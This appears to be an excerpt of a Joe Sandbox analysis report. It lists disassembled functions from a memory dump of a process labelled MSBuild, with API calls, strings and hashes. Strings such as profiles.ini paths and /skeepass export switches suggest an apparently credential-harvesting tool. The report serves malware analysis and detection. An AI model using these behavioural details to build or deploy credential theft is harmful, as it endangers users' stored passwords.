                                                                                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                            • memset.MSVCRT ref: 00413292
                                                                                                                                            • memset.MSVCRT ref: 004132B4
                                                                                                                                            • memset.MSVCRT ref: 004132CD
                                                                                                                                            • memset.MSVCRT ref: 004132E1
                                                                                                                                            • memset.MSVCRT ref: 004132FB
                                                                                                                                            • memset.MSVCRT ref: 00413310
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                            • memset.MSVCRT ref: 004133C0
                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                            Strings
                                                                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                            • {Unknown}, xrefs: 004132A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                            • API String ID: 4111938811-1819279800
                                                                                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                            Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 829165378-0
                                                                                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                            Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00404172
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                            • memset.MSVCRT ref: 00404200
                                                                                                                                            • memset.MSVCRT ref: 00404215
                                                                                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                                                                                            • memset.MSVCRT ref: 0040426E
                                                                                                                                            • memset.MSVCRT ref: 004042CD
                                                                                                                                            • memset.MSVCRT ref: 004042E2
                                                                                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                            • API String ID: 2454223109-1580313836
                                                                                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                            Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                            • API String ID: 4054529287-3175352466
                                                                                                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                            Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                            • API String ID: 667068680-2887671607
                                                                                                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                            Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                            • API String ID: 2000436516-3842416460
                                                                                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                            Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1043902810-0
                                                                                                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                            Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                            • memset.MSVCRT ref: 004085CF
                                                                                                                                            • memset.MSVCRT ref: 004085F1
                                                                                                                                            • memset.MSVCRT ref: 00408606
                                                                                                                                            • strcmp.MSVCRT ref: 00408645
                                                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                            • memset.MSVCRT ref: 0040870E
                                                                                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                            • String ID: ---
                                                                                                                                            • API String ID: 3437578500-2854292027
                                                                                                                                            • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                            • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                            Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp
                                                                                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                            • API String ID: 2081463915-1959339147
                                                                                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                            Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1700100422-0
                                                                                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                            Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 552707033-0
                                                                                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                            Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                            • strchr.MSVCRT ref: 0040C140
                                                                                                                                            • strchr.MSVCRT ref: 0040C151
                                                                                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                            • memset.MSVCRT ref: 0040C17A
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                            • String ID: 4$h
                                                                                                                                            • API String ID: 4066021378-1856150674
                                                                                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
